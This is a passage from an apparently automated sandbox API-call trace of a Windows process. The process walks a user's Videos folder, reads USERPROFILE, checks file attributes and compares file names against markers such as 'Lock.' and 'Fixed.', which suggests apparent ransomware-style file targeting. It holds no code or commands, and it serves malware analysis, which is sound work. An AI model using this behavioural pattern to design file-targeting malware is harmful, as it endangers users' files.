(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ezpwetuyq0o54txyd5.mkv")) returned 1 [0258.672] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9fddf00, ftCreationTime.dwHighDateTime=0x1d4d364, ftLastAccessTime.dwLowDateTime=0xbed2aea0, ftLastAccessTime.dwHighDateTime=0x1d4c7ea, ftLastWriteTime.dwLowDateTime=0xbed2aea0, ftLastWriteTime.dwHighDateTime=0x1d4c7ea, nFileSizeHigh=0x0, nFileSizeLow=0x15e14, dwReserved0=0x18e2, dwReserved1=0x4, cFileName="EzPWeTUYQ0o54TxyD5.mkv", cAlternateFileName="EZPWET~1.MKV")) returned 0 [0258.672] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0258.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.672] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.672] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0258.673] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.673] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.673] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0258.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.674] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x78) returned 0x24f5278 [0258.675] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EzPWeTUYQ0o54TxyD5.mkv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv", lpFilePart=0x8bf658*="EzPWeTUYQ0o54TxyD5.mkv") returned 0x3b [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0258.676] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EzPWeTUYQ0o54TxyD5.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ezpwetuyq0o54txyd5.mkv")) returned 0xffffffff [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0258.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o7xXPd8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xXPd8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xXPd8", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.677] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0258.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o7xXPd8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.678] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xXPd8", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0258.678] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.678] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9e8 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0258.678] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0258.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.678] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0258.679] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0258.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.679] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0258.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.680] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.680] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.680] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/o7xXPd8", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7bad60, ftCreationTime.dwHighDateTime=0x1d4c723, ftLastAccessTime.dwLowDateTime=0x5d997bf0, ftLastAccessTime.dwHighDateTime=0x1d4cd4e, ftLastWriteTime.dwLowDateTime=0x5d997bf0, ftLastWriteTime.dwHighDateTime=0x1d4cd4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa7052f, dwReserved1=0x11feb, cFileName="o7xXPd8", cAlternateFileName="")) returned 0xaa5820 [0258.680] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.681] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0258.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.682] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.682] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab38 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.683] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0258.683] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.684] RtlAllocateHeap 